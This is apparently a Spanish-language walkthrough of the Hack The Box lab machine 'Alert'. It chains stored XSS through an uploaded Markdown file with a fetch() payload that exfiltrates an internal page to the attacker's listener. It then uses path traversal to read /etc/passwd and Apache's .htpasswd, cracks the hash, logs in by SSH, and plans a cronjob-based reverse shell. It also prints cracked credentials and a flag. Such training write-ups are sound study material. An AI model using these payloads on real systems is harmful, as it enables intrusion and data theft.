Alert expone una herramienta para contenido Markdown, combinando esta con las vulnerabilidades XSS y Path Traversal logramos la lectura de credenciales de un archivo de configuracion de Apache lo que nos permitio el acceso a la maquina. Escalamos privilegios tras modificar un archivo de configuracion ejecutado por un cronjob de una herramienta de monitoreo.
Sin embargo este subdominio requiere de credenciales para acceder al contenido.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ curl statistics.alert.htb
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at statistics.alert.htb Port 80</address>
</body></html>
❯
Web App
En la pagina de ‘Mark Viewer’ podemos observar el contenido de un archivo subido y ademas este nos crea una direccion url.
Como se observa en el contenido el codigo es “codificado” por lo que no es posible ejecutar codigo PHP.
En la pagina ‘About Us’ menciona que se realiza una revision a todos los mensajes de contacto.
En la pagina ‘Contact Us’ rellenamos el formulario y lo enviamos, agregando una etiqueta script para solicitar un recurso a nuestro servidor http.
En nuestro servidor observamos que se realizo una solicitud, ademas confirmando lo que se menciona en ‘About Us’.
1
2
3
4
5
❯ httphere .
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80(http://0.0.0.0:80/) ...
10.10.11.44 - - [16/Jan/2025 21:13:31] code 404, message File not found
10.10.11.44 - - [16/Jan/2025 21:13:31]"GET /a'></script> HTTP/1.1"404 -
Por otra parte, observamos que las paginas trabajan con el parametro page (/index.php?page=contact, /index.php?page=donate, ...), encontramos que no podemos acceder a la pagina messages.php y al directorio /uploads/, es probable que unicamente el administrador pueda acceder a este.
❯ curl -sI http://alert.htb/messages.php
HTTP/1.1 200 OK
Date: Fri, 17 Jan 2025 02:32:10 GMT
Server: Apache/2.4.41 (Ubuntu)Content-Type: text/html;charset=UTF-8
❯ curl -s http://alert.htb/messages.php
❯
❯ curl -s http://alert.htb/uploads/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at alert.htb Port 80</address>
</body></html>
❯
XSS + Path Traversal
A traves del formulario ‘Contact Us’ intentamos ejecutar codigo javascript sin embargo al intentar ingresar mas codigo o ejecutar codigo externo no funcionaba.
1
2
3
4
5
6
10.10.11.44 - - [16/Jan/2025 21:46:41] code 404, message File not found
10.10.11.44 - - [16/Jan/2025 21:46:41]"GET /ex.js"></script> HTTP/1.1"404 -
10.10.11.44 - - [16/Jan/2025 21:47:04] code 404, message File not found
10.10.11.44 - - [16/Jan/2025 21:47:04]"GET /ex.js"/> HTTP/1.1"404 -
10.10.11.44 - - [16/Jan/2025 21:47:12] code 404, message File not found
10.10.11.44 - - [16/Jan/2025 21:47:12]"GET /ex.js"/> HTTP/1.1"404 -
Existe una alternativa para agregar mas codigo, la funcionalidad Markdow viewer, si observamos un simple console.log no se ve “afectado” a diferencia de codigo PHP y tambien, este nos crea una direccion URL.
Intentamos realizar una solicitud a nuestro servidor http enviando la direccion URL de nuestro contenido javascript por el formulario. Iniciando con la creacion del archivo markdown y subiendolo al sitio.
<!-- Contenido de : http://alert.htb/visualizer.php?link_share=67df3f6a6ec892.84629882.md --><body><script>fetch('http://alert.htb//index.php?page=message').then(response=>response.text()).then(data=>{returnfetch('http://10.10.14.101:8000',{method:'POST',headers:{'Content-Type':'text/plain',},body:data,});}).then(response=>response.text()).then(data=>{console.log(1);}).catch(error=>{console.error(2);});</script></body></html>
En el puerto 8000 con netcat a la escucha observamos una solicitud donde observamos el codigo fuente html de la pagina messages, se muestra un archivo de texto en la ruta messages.php?file=2024-03-10_15-48-34.txt.
Modificamos la direccion en la ejecucion de nuestro script apunando a messages.php?file=2024-03-10_15-48-34.txt y, observamos que el contenido del archivo es una etiqueta html o el archivo esta vacio.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ nc -lvvp 8000listening on [any]8000 ...
connect to [10.10.15.23] from alert.htb [10.10.11.44]52270POST / HTTP/1.1
Host: 10.10.15.23:8000
Connection: keep-alive
Content-Length: 12User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Content-Type: text/plain
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate
<pre></pre>
sent 0, rcvd 352
El archivo de texto que encontramos esta vacio y, la pagina acepta nombres de archivos, agregamos el archivo /etc/passwd agregando ../ hasta alcanzar el archivo.
Asi tambien logramos obtener el codigo fuene de index.php y messages.php, en donde observamos que unicamente pueden acceder usuarios del localhost en este ultimo.
Realizando enumeracion de archivos, encontramos la configuracion de apache /etc/apache2/sites-enabled/000-default.conf, donde observamos la direccion del archivo .httpasswd para el subdominio statistics.
El contenido del archivo mencionado son las credenciales de acceso a este subdominio.
1
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Cracking the Hash
Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash.
1
2
3
4
5
6
7
8
9
10
❯ john hash_albert --wordlist=$ROCK --format=md5crypt-long
Using default input encoding: UTF-8
Loaded 1 password hash(md5crypt-long, crypt(3)$1$ (and variants)[MD5 32/64])Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (albert)1g 0:00:00:00 DONE (2025-01-16 23:25) 1.694g/s 4772p/s 4772c/s 4772C/s meagan..medicina
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯
statistics
Utilizamos las credenciales en el subdominio y unicamente se muestran graficos y no existe alguna otra funcionalidad.
Shell
Con la contrasena crackeada logramos acceder por ssh y obtener nuestra flag user.txt.
┌──(kali㉿kali)-[~/htb/alert]└─$ ssh albert@alert.htb # manchesterunitedalbert@alert.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64) * Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 17 Jan 2025 04:29:20 AM UTC
System load: 0.0
Usage of /: 73.0% of 5.03GB
Memory usage: 28%
Swap usage: 0%
Processes: 263 Users logged in: 1 IPv4 address for eth0: 10.10.11.44
IPv6 address for eth0: dead:beef::250:56ff:feb0:80c6
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jan 17 04:29:21 2025 from 10.10.15.23
albert@alert:~$ whoami;id;pwdalbert
uid=1000(albert)gid=1000(albert)groups=1000(albert),1001(management)/home/albert
albert@alert:~$ cat user.txt
2b26f4254b3cf43ebbf74c3fefc6f0c9
albert@alert:~$
Privesc
Observamos que el usuario root ejecutando multiples procesos.
albert@alert:/opt/website-monitor$ ls -lah
total 96K
drwxrwxr-x 7 root root 4.0K Oct 12 01:07 .
drwxr-xr-x 4 root root 4.0K Oct 12 00:58 ..
drwxrwxr-x 2 root management 4.0K Oct 12 04:17 config
drwxrwxr-x 8 root root 4.0K Oct 12 00:58 .git
drwxrwxr-x 2 root root 4.0K Oct 12 00:58 incidents
-rwxrwxr-x 1 root root 5.2K Oct 12 01:00 index.php
-rwxrwxr-x 1 root root 1.1K Oct 12 00:58 LICENSE
-rwxrwxr-x 1 root root 1.5K Oct 12 01:00 monitor.php
drwxrwxrwx 2 root root 4.0K Oct 12 01:07 monitors
-rwxrwxr-x 1 root root 104 Oct 12 01:07 monitors.json
-rwxrwxr-x 1 root root 40K Oct 12 00:58 Parsedown.php
-rwxrwxr-x 1 root root 1.7K Oct 12 00:58 README.md
-rwxrwxr-x 1 root root 1.9K Oct 12 00:58 style.css
drwxrwxr-x 2 root root 4.0K Oct 12 00:58 updates
albert@alert:/opt/website-monitor$ cat .git/config
[core]repositoryformatversion=0filemode=truebare=falselogallrefupdates=true[remote "origin"]url= https://github.com/neatnik/website-monitor.git
fetch= +refs/heads/*:refs/remotes/origin/*
[branch "main"]remote= origin
merge= refs/heads/main
albert@alert:/opt/website-monitor$
Se ejecuta inotifywait en el directorio /opt/website-monitor/config, el unico archivo que existe unicamente define la constante PATH. Si observamos los permisos, albert puede acceder a este archivo.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
albert@alert:~$ ls /opt/website-monitor/config
configuration.php
albert@alert:~$ cat /opt/website-monitor/config/configuration.php
<?php
define('PATH', '/opt/website-monitor');?>
albert@alert:~$ cd /opt/website-monitor/config
albert@alert:/opt/website-monitor/config$ ll
total 12drwxrwxr-x 2 root management 4096 Jan 17 04:53 ./
drwxrwxr-x 7 root root 4096 Oct 12 01:07 ../
-rwxrwxr-x 1 root management 49 Jan 17 04:53 configuration.php*
albert@alert:/opt/website-monitor/config$ id
uid=1000(albert)gid=1000(albert)groups=1000(albert),1001(management)albert@alert:/opt/website-monitor/config$
Shell
Si nos basamos en que existe un cronjob que ejecuta este archivo de configuracion segun la documentacion podemos ejecutar una shell inversa.